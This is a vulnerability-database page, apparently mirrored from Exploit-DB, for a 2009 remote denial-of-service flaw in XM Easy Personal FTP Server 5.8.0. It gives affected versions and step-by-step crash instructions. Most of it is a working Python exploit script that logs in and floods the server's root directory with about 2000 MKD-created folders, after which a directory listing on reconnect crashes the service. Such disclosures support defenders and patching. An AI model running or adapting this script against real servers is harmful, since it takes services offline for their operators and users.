Lucene search
+L

XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service

🗓️ 24 Nov 2009 00:00:00Reported by leinakesiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 36 Views

XM Easy Personal FTP Server 5.8.0 DoS via Handling More than 2000 Files/Folders in Root Director

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-4048
13 Nov 200900:00
circl
circl
Circl
CVE-2009-4108
13 Nov 200900:00
circl
cve
CVE
CVE-2009-4048
23 Nov 200917:00
cve
cve
CVE
CVE-2009-4108
28 Nov 200911:00
cve
cvelist
Cvelist
CVE-2009-4048
23 Nov 200917:00
cvelist
cvelist
Cvelist
CVE-2009-4108
28 Nov 200911:00
cvelist
exploitdb
Exploit DB
XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service
13 Nov 200900:00
exploitdb
euvd
EUVD
EUVD-2009-4019
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2009-4079
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-4048
23 Nov 200917:30
nvd
Rows per page
Date of Discovery: 24-Nov-2009

Credits:leinakesi[at]gmail.com

Vendor: Dxmsoft
*******************************************************************************
Affected:

        XM Easy Personal FTP Server 5.8.0
        Earlier versions may also be affected
*******************************************************************************
Overview:

        XM Easy Personal FTP Server failed to handle more than 2000 files or folders in

the root directory.
*******************************************************************************
Details:

        if you could log on the server, take the following steps and the server will

crash which lead to DoS.

        1.upload 2000 files or folders.
        2.close the current connection.
        3.use a ftp client to reconnect the server.
                user ...
                pass ...
                port ...
                list ...
                crash!!!!!!
*******************************************************************************
Exploit example:

1.upload 2000 folders.
#!/usr/bin/python
import socket
import sys

def Usage():
    print ("Usage:  ./expl.py <serv_ip>      <Username> <password>\n")
    print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
        Usage()
        sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    test_string='a'
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    sock.send("user %s\r\n" %username)
    r=sock.recv(1024)
    sock.send("pass %s\r\n" %passwd)

    for i in range(1,200):
         sock.send("mkd " + "a" * i +"\r\n")
         print "[-] " + ("mkd " + "a" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "b" * i +"\r\n")
         print "[-] " + ("mkd " + "b" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "c" * i +"\r\n")
         print "[-] " + ("mkd " + "c" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "d" * i +"\r\n")
         print "[-] " + ("mkd " + "d" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "e" * i +"\r\n")
         print "[-] " + ("mkd " + "e" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "f" * i +"\r\n")
         print "[-] " + ("mkd " + "f" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "g" * i +"\r\n")
         print "[-] " + ("mkd " + "g" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "h" * i +"\r\n")
         print "[-] " + ("mkd " + "h" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "i" * i +"\r\n")
         print "[-] " + ("mkd " + "i" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "j" * i +"\r\n")
         print "[-] " + ("mkd " + "j" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"

    sock.close()
    sys.exit(0);

2.use a ftp client to reconnect the server
for example:
start->run->cmd->ftp 127.0.0.1->*****->*****->dir

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Nov 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24
EPSS0.02434
36